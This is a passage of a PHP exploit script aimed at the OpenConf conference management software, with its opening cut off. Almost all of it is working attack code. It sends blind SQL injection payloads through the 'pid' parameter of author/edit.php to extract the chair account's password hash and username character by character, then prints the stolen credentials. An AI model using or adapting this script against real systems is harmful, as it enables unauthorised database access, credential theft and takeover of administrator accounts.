\n"; print "\nExample....: php $argv[0] http://127.0.0.1/"; print "\nExample....: php $argv[0] http://localhost/openconf/\n"; die(); } $ch = curl_init(); curl_setopt($ch, CURLOPT_HEADER, 1); curl_setopt($ch, CURLOPT_VERBOSE, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); if (!preg_match('/href="author\/edit.php"/', http_get('openconf.php'))) die("\n[-] Failed: submission edit disabled\n"); $index = 1; $hash = ''; $chars = array_merge(range(48, 57), range(97, 102), array(0)); // 0-9 a-f print "\n[-] Chair password hash...: "; while (!strpos($hash,chr(0))) { for ($i = 0, $n = count($chars); $i <= $n; $i++) { if ($i == $n) die("\n[-] Exploit failed!\n"); $sql = urlencode("-1 OR 1=(SELECT IF(ASCII(SUBSTR(value,{$index},1))={$chars[$i]},0,1) FROM config WHERE setting=".hex_enc("OC_chair_pwd").") LIMIT 1#"); if (preg_match("/is incorrect/", http_post("author/edit.php", "ocaction=1&pid={$sql}"))) { $hash .= chr($chars[$i]); print chr($chars[$i]); break; } } $index++; } $index = 1; $user = ''; $chars = array_merge(array(0), range(97, 172), array(95), range(48, 57)); // Any "word" character print "\n[-] Chair username........: "; while (!strpos($user,chr(0))) { for ($i = 0, $n = count($chars); $i <= $n; $i++) { if ($i == $n) die("\n[-] Exploit failed!\n"); $sql = rawurlencode("-1 OR 1=(SELECT IF(ASCII(SUBSTR(value,{$index},1))={$chars[$i]},0,1) FROM config WHERE setting=".hex_enc("OC_chair_uname").") LIMIT 1#"); if (preg_match("/is incorrect/", http_post("author/edit.php", "ocaction=1&pid={$sql}"))) { $user .= chr($chars[$i]); print chr($chars[$i]); break; } } $index++; } print "\n"; ?>